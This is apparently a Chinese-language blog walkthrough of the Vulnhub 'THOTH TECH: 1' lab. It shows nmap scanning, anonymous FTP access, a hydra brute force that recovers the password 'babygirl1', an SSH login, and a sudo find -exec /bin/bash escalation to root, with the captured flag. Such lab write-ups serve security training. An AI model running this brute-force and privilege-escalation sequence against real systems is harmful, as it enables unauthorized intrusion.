随笔- 22 文章- 0 评论- 2 阅读- 42534

Vulnhub: THOTH TECH: 1

2021-08-24 22:02:27

1. 找到目标:

通过开放端口找到目标192.168.1.105。

┌──(kali㉿kali)-[~]
└─$ nmap 192.168.1.1/24
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-24 20:23 CST
Nmap scan report for 192.168.1.1
Host is up (0.0019s latency).
Not shown: 997 closed ports
PORT     STATE    SERVICE
53/tcp   filtered domain
80/tcp   open     http
1900/tcp open     upnp


Nmap scan report for 192.168.1.104

Host is up (0.0070s latency).

All 1000 scanned ports on 192.168.1.104 are closed




Nmap scan report for 192.168.1.105

Host is up (0.00038s latency).

Not shown: 997 closed ports

PORT   STATE SERVICE

21/tcp open  ftp

22/tcp open  ssh

80/tcp open  http




Nmap scan report for 192.168.1.106

Host is up (0.00047s latency).

All 1000 scanned ports on 192.168.1.106 are closed




Nmap scan report for 192.168.1.108

Host is up (0.0057s latency).

All 1000 scanned ports on 192.168.1.108 are closed




Nmap scan report for 192.168.1.252

Host is up (0.0095s latency).

Not shown: 998 filtered ports

PORT     STATE SERVICE

80/tcp   open  http

1900/tcp open  upnp


Nmap done: 256 IP addresses (6 hosts up) scanned in 7.30 seconds

2.扫描并分析目标

┌──(kali㉿kali)-[~]
└─$ nmap -sC -A 192.168.1.105


Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-24 21:32 CST

Nmap scan report for 192.168.1.105

Host is up (0.00039s latency).

Not shown: 997 closed ports

PORT   STATE SERVICE VERSION

21/tcp open  ftp     vsftpd 3.0.3

| ftp-anon: Anonymous FTP login allowed (FTP code 230)

|_-rw-r--r--    1 0        0             110 Jul 02 09:33 note.txt

| ftp-syst:

|   STAT:

| FTP server status:

|      Connected to ::ffff:192.168.1.106

|      Logged in as ftp

|      TYPE: ASCII

|      No session bandwidth limit

|      Session timeout in seconds is 300

|      Control connection is plain text

|      Data connections will be plain text

|      At session startup, client count was 1

|      vsFTPd 3.0.3 - secure, fast, stable

|End of status

22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

|   3072 ac:d2:7b:75:80:67:f2:9d:95:67:52:99:c8:2f🆎7b (RSA)

|   256 78:ca:86:73:b6:87:06:08:eb:7a:9c🆎cf:9d:89:16 (ECDSA)

|  256 93:49:d7:8c:1c:07:7e:8e:79:91:2b:bf:2d:0d:34:6b (ED25519)

80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))

|_http-server-header: Apache/2.4.41 (Ubuntu)

|_http-title: Apache2 Ubuntu Default Page: It works

Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel


Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 7.40 seconds

3.查看FTP服务

通过服务扫描可知，FTP服务允许匿名登录，且包含文件note.txt。

登录FTP服务器，下载并查看该文件。

由信息可知，存在一个用户名为pwnlab的ftp用户，且其密码为弱密码。

┌──(kali㉿kali)-[~]
└─$ ftp 192.168.1.105
Connected to 192.168.1.105.
220 (vsFTPd 3.0.3)
Name (192.168.1.105:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 65534    65534        4096 Jul 02 09:33 .
drwxr-xr-x    2 65534    65534        4096 Jul 02 09:33 ..
-rw-r--r--    1 0        0             110 Jul 02 09:33 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (110 bytes).
226 Transfer complete.
110 bytes received in 0.00 secs (2.9140 MB/s)
ftp> exit
221 Goodbye.


┌──(kali㉿kali)-[~]

└─$ cat note.txt

Dear pwnlab,


My name is jake. Your password is very weak and easily crackable, I think change your password.

4.密码暴力破解

使用hrdra破解用户pwnlab的登陆密码。

可得用户pwnlabpwnlab的密码为babygirl1。

┌──(kali㉿kali)-[~]
└─$ hydra -l pwnlab -P /usr/share/wordlists/rockyou.txt 192.168.1.105 ftp
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations,
or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-08-24 21:47:33

[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore

[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task

[DATA] attacking ftp://192.168.1.105:21/

[21][ftp] host: 192.168.1.105   login: pwnlab   password: babygirl1

1 of 1 target successfully completed, 1 valid password found

Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-08-24 21:48:31

5.登录服务器

以pwnlab身份登录服务器。

┌──(kali㉿kali)-[~]
└─$ ssh pwnlab@192.168.1.105
pwnlab@192.168.1.105's password: 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)



Documentation:  https://help.ubuntu.com


Management:     https://landscape.canonical.com


Support:        https://ubuntu.com/advantage





System information as of Tue 24 Aug 2021 01:49:55 PM UTC




System load:  0.0                Processes:               149

Usage of /:   25.0% of 19.56GB   Users logged in:         0

Memory usage: 22%                IPv4 address for enp0s3: 192.168.1.105

Swap usage:   0%








Super-optimized for small spaces - read how we shrank the memory

footprint of MicroK8s to make it the smallest full K8s around.




https://ubuntu.com/blog/microk8s-memory-optimisation








66 updates can be installed immediately.

0 of these updates are security updates.

To see these additional updates run: apt list --upgradable




The list of available updates is more than a week old.

To check for new updates run: sudo apt update


Last login: Tue Aug 24 07:44:49 2021 from 192.168.1.106

pwnlab@thothtech:~$

pwnlab@thothtech:~$ whoami

pwnlab

6.查看用户权限并提升权限

使用命令sudo -l查看用户权限可知，用户pwnlab可以使用以root身份运行程序find。并借此获得root权限。

pwnlab@thothtech:~$ sudo -l
Matching Defaults entries for pwnlab on thothtech:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User pwnlab may run the following commands on thothtech:

(root) NOPASSWD: /usr/bin/find

pwnlab@thothtech:~$ sudo /usr/bin/find . -exec /bin/bash ; -quit

root@thothtech:/home/pwnlab# whoami

root

root@thothtech:/home/pwnlab#

7.获得通关flag。

root@thothtech:/home/pwnlab# cd /root
root@thothtech:~# ls
root.txt  snap
root@thothtech:~# cat root.txt 
Root flag: d51546d5bcf8e3856c7bff5d201f0df6
good job 😃

root@thothtech:~#